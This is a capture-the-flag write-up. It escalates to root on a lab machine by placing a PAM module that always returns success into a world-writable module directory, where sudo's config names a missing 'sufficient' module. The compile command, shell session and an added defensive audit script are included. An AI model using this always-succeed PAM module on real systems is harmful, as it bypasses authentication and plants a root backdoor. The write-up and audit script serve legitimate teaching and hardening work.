HN0x03 | Escalade comme un Yamakasi - Pampampilap

This challenge is a part of the Hacky’Nov 0x03 CTF.

Goal

Find a way to become root.

Walkthrough

Here we’re back to basics: a basic user on a machine, with very little information to go on. Let’s start by checking the sudo permissions:

lolo@6c3ee15faa89:~$ sudo -l
User lolo may run the following commands on 6c3ee15faa89:
    (lekik) NOPASSWD: ALL
lolo@6c3ee15faa89:~$ sudo -u lekik sudo -l
[sudo] password for lekik:
Sorry, try again.

Well, we’re allowed to run commands as the user lekik without a password, but since we don’t know lekik’s password we can’t go any further: lekik’s own sudo prompt asks for it, so we can’t even tell whether lekik has any sudo permissions.

Let’s try to find suid binaries:

lolo@6c3ee15faa89:~$ find / -type f -perm /u=s 2>/dev/null
/usr/bin/su
/usr/bin/gpasswd
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/mount
/usr/bin/umount
/usr/bin/newgrp
/usr/bin/sudo
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign

Nothing unusual here… It looks like there is no “obvious” way to escalate our privileges for now.

Maybe we can check for funny files and permissions?

I’m not really used to using linpeas and I often struggle to find the useful information in the output. But many people love it, so let’s try it:

lolo@6c3ee15faa89:~$ ./linpeas.sh
[...]
╔══════════╣ Interesting writable files owned by me or writable by everyone (not in Home) (max 500)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-files
/dev/mqueue
/dev/shm
/home/lolo
/run/lock
/tmp
/usr/lib/x86_64-linux-gnu/security
/var/tmp
[...]

We can see that /usr/lib/x86_64-linux-gnu/security is writable. Note that if you don’t like linpeas or don’t have it, you can also use the good old find command:

lolo@6c3ee15faa89:~$ find /usr /bin -writable -not -type l
/usr/lib/x86_64-linux-gnu/security

This lists everything under /usr and /bin that the current user can write to, skipping symlinks.

Let’s check what’s inside this security directory, since it looks a bit weird to have something in /usr that is writable by a user:

lolo@6c3ee15faa89:~$ ls -la /usr/lib/x86_64-linux-gnu/security/
total 1348
drwxrwxrwx 1 root root   4096 May 13 18:54 .
drwxr-xr-x 1 root root   4096 May 13 19:05 ..
-rw-r--r-- 1 root root  18432 Sep 21  2023 pam_access.so
-rw-r--r-- 1 root root  14416 Sep 21  2023 pam_debug.so
-rw-r--r-- 1 root root  14040 Sep 21  2023 pam_deny.so
[...]
-rw-r--r-- 1 root root  55376 Sep 21  2023 pam_unix.so
-rw-r--r-- 1 root root  14336 Sep 21  2023 pam_userdb.so
-rw-r--r-- 1 root root  14336 Sep 21  2023 pam_usertype.so
-rw-r--r-- 1 root root  14336 Sep 21  2023 pam_warn.so
-rw-r--r-- 1 root root  14336 Sep 21  2023 pam_wheel.so
-rw-r--r-- 1 root root  22528 Sep 21  2023 pam_xauth.so

We can see that there are some PAM modules in there. PAM is the Pluggable Authentication Modules system, which many services use to delegate authentication (and related tasks such as account and session management) to a common, external framework. Many (if not all?) mainstream Linux distributions rely heavily on PAM, and binaries like sudo or su use it by default.

Since we’re allowed to write new PAM modules in this directory, we can try to create a new one! However, for this trick to work, the module has to be referenced from one of the /etc/pam.d/* configuration files, and those are usually owned by root and not writable by us… So let’s check whether any of them already references a module that is missing from the directory:

# Use comm to print only modules that are used in files in /etc/pam.d/ but that do not exist in /usr/lib/x86_64-linux-gnu/security
# Yes I totally flex this command :)

lolo@6c3ee15faa89:~$ comm -23 <(grep --no-filename -o -r "pam_.*\.so" /etc/pam.d/ | sort -u) <(ls -1 /usr/lib/x86_64-linux-gnu/security)
pam_sudo.so
lolo@6c3ee15faa89:~$ grep -r pam_sudo.so /etc/pam.d/
/etc/pam.d/sudo:auth       sufficient   pam_sudo.so

We can see that a pam_sudo.so module is referenced in the /etc/pam.d/sudo file but does not exist on disk. Since pam_sudo.so is listed as sufficient, a success from that module ends the auth stack right there with an overall success (no later module, such as pam_unix.so asking for the password, is consulted), as long as no earlier required module has failed. So we can create a pam_sudo.so module that always succeeds and try again to use sudo as lekik:

/* pam_sudo.c: a stand-in for the missing module that accepts every authentication.
 * __unused silences the unused-parameter warnings that -Wextra -Werror would turn into errors. */
#define __unused __attribute__((unused))

#include <security/pam_modules.h>

/* Called by pam_authenticate(); returning PAM_SUCCESS without looking at the user
 * or asking for a password is what makes the "sufficient" line in /etc/pam.d/sudo pass. */
PAM_EXTERN int pam_sm_authenticate(__unused pam_handle_t *handle, __unused int flags, __unused int argc, __unused const char **argv)
{
  return PAM_SUCCESS;
}

Compile it like that:

gcc -W -Wall -Wextra -Werror -pedantic -shared -o /usr/lib/x86_64-linux-gnu/security/pam_sudo.so pam_sudo.c

We can now try to use sudo as lekik:

lolo@6c3ee15faa89:~$ sudo -u lekik sudo -l
User lekik may run the following commands on 6c3ee15faa89:
    (ALL) ALL

Perfect: lekik can run any command as root, so we can too!

lolo@6c3ee15faa89:~$ sudo -u lekik sudo su -
root@6c3ee15faa89:~# cat flag.txt
HNx03{FunnyPam}
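From the defender’s side, the chain above only works because two things are true at once: the PAM module directory is writable by a non-root user, and a pam.d file references a module that isn’t on disk. The script below is an added audit example, not part of the original write-up; it builds a constructed pam.d/security layout inside a temporary directory (no real /etc or /usr path is touched) and reports both findings. Compared to the comm one-liner used above, the regex is tightened to a single module name per match (a greedy pam_.*\.so would swallow a whole line containing two modules) and both comm inputs go through sort -u so comm never sees unsorted data. It assumes GNU grep, comm and ls; the directory names and the sample pam.d files are made up.

```shell
#!/usr/bin/env bash
# Added example (not from the original write-up). Audits a PAM layout for:
#   1. a module directory that group or others can write to
#   2. a pam.d entry naming a module that is missing from that directory
# Everything is constructed in a temp dir; assumption: GNU grep/comm/ls.
set -eu

# --- constructed sample layout (not a real system) -------------------------
WORK="$(mktemp -d)"
trap 'rm -rf "$WORK"' EXIT
PAMD="$WORK/pam.d"            # stands in for /etc/pam.d
SECDIR="$WORK/security"       # stands in for /usr/lib/x86_64-linux-gnu/security
mkdir -p "$PAMD" "$SECDIR"
touch "$SECDIR/pam_unix.so" "$SECDIR/pam_deny.so"   # modules present on disk
chmod 777 "$SECDIR"                                  # the weak permission from the write-up

cat > "$PAMD/sudo" <<'EOF'
auth       sufficient   pam_sudo.so
auth       required     pam_unix.so
account    required     pam_unix.so
EOF
cat > "$PAMD/login" <<'EOF'
auth       required     pam_unix.so nullok
auth       [success=1 default=ignore] pam_deny.so
EOF

# --- checks -----------------------------------------------------------------

# Print (sorted, one per line) every module named under $1 that is absent from $2.
# One module name per match, and both comm inputs are normalised with sort -u.
dangling_pam_modules() {
    local refs have
    refs="$(mktemp)"; have="$(mktemp)"
    grep -rhoE 'pam_[A-Za-z0-9_]+\.so' "$1" | sort -u > "$refs"
    ls -1 "$2" | sort -u > "$have"
    comm -23 "$refs" "$have"
    rm -f "$refs" "$have"
}

# Return 0 when the group or the other write bit is set on directory $1.
module_dir_group_or_world_writable() {
    local perms
    perms="$(ls -ld "$1" | cut -c1-10)"      # e.g. drwxrwxrwx
    case "$perms" in
        ?????w*|????????w?) return 0 ;;      # char 6 = group w, char 9 = other w
        *) return 1 ;;
    esac
}

# Run both checks; return 1 when anything was found so the script can gate a job.
audit_pam() {
    local pamd="$1" secdir="$2" rc=0 m
    if module_dir_group_or_world_writable "$secdir"; then
        echo "WARN: $secdir is writable by group or others"
        rc=1
    fi
    for m in $(dangling_pam_modules "$pamd" "$secdir"); do
        echo "WARN: $m is referenced in $pamd but does not exist in $secdir:"
        grep -rn "$m" "$pamd" | sed 's/^/      /'
        rc=1
    done
    return "$rc"
}

audit_pam "$PAMD" "$SECDIR" || echo "audit found problems (exit $?)"
```

On a real host you would call audit_pam /etc/pam.d /usr/lib/x86_64-linux-gnu/security (or the distribution’s module path); a non-zero exit means either the directory permissions or a dangling module reference needs fixing. A dangling reference is only harmless while the module directory is root-owned and not writable by anyone else, which is exactly the condition this box broke.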